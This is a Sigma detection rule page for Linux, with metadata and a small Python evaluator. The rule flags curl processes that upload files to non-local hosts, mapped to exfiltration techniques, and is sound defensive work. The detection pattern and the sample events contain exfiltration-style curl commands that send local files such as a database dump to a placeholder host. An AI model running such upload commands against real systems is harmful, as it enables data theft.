Suspicious Curl File Upload - Linux
Detects a suspicious curl process start that adds a file to a web request
Authors: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON
Created: Thu Sep 15
Updated: Tue May 02
Rule ID: 00b90cc1-17ec-402c-96ad-3a8117d7a582
Platform: linux
Log Source
Product: Linux (raw: linux)
Category: Process Creation (raw: process_creation)
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
Detection Logic (3 selectors)
detection:
    selection_img:
        Image|endswith: '/curl'
    selection_cli:
        - CommandLine|contains:
              - ' --form' # Also covers the "--form-string"
              - ' --upload-file '
              - ' --data '
              - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
        - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
    filter_optional_localhost:
        CommandLine|contains:
            - '://localhost'
            - '://127.0.0.1'
    condition: all of selection_* and not 1 of filter_optional_*

False Positives
Scripts created by developers and admins
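An added example, not code from the Sigma project or this rule's authors: it transcribes the three selectors above into a small Python evaluator and runs it over constructed process-creation events, so the localhost filter and the case-sensitive short-flag regex can be seen deciding each event. The evaluator, the event field names and the sample events are assumptions.

```python
import re

# Hand-written evaluator for the three selectors above (assumption: this is
# not pySigma or any real Sigma backend; field names follow the rule's
# Image/CommandLine fields as they appear in a process_creation event).
LONG_FLAGS = (' --form', ' --upload-file ', ' --data ', ' --data-')
SHORT_FLAG_RE = re.compile(r'\s-[FTd]\s')  # case sensitive: only -F, -T, -d
LOCAL_TARGETS = ('://localhost', '://127.0.0.1')


def matches(event):
    """Return True when an event satisfies
    'all of selection_* and not 1 of filter_optional_*'."""
    image = event.get('Image', '')
    cmdline = event.get('CommandLine', '')
    selection_img = image.endswith('/curl')
    selection_cli = (any(flag in cmdline for flag in LONG_FLAGS)
                     or SHORT_FLAG_RE.search(cmdline) is not None)
    filter_localhost = any(t in cmdline for t in LOCAL_TARGETS)
    return selection_img and selection_cli and not filter_localhost


# Constructed sample events; example.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    {'Image': '/usr/bin/curl',
     'CommandLine': 'curl -F upload=@/tmp/report.pdf https://example.invalid/drop'},
    {'Image': '/usr/bin/curl',
     'CommandLine': 'curl --data-binary @/tmp/dump.sql https://example.invalid/api'},
    {'Image': '/usr/bin/curl',   # localhost filter suppresses this one
     'CommandLine': 'curl -T /tmp/build.tar http://127.0.0.1:8080/artifacts'},
    {'Image': '/usr/bin/curl',   # -D (dump headers) is not -d: regex is case sensitive
     'CommandLine': 'curl -D /tmp/headers.txt https://example.invalid/'},
    {'Image': '/usr/bin/wget',   # selection_img fails: not curl
     'CommandLine': 'wget --post-data x=1 https://example.invalid/'},
]


def alerting_indices(events):
    """Indices of the events that would raise this rule."""
    return [i for i, e in enumerate(events) if matches(e)]


if __name__ == '__main__':
    for i in alerting_indices(SAMPLE_EVENTS):
        print('ALERT:', SAMPLE_EVENTS[i]['CommandLine'])
```

Only the first two sample events alert: the third is dropped by the localhost filter and the fourth because `-D` is not one of the case-sensitive `-F`, `-T`, `-d` flags.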
MITRE ATT&CK
Tactics: Exfiltration (TA0010), Command and Control (TA0011)
Techniques: T1567 Exfiltration Over Web Service, T1105 Ingress Tool Transfer
Rule Metadata
Rule ID
00b90cc1-17ec-402c-96ad-3a8117d7a582
Status
test
Level
medium
Type
Detection
Created
Thu Sep 15
Modified
Tue May 02
Path
rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
Raw Tags
attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105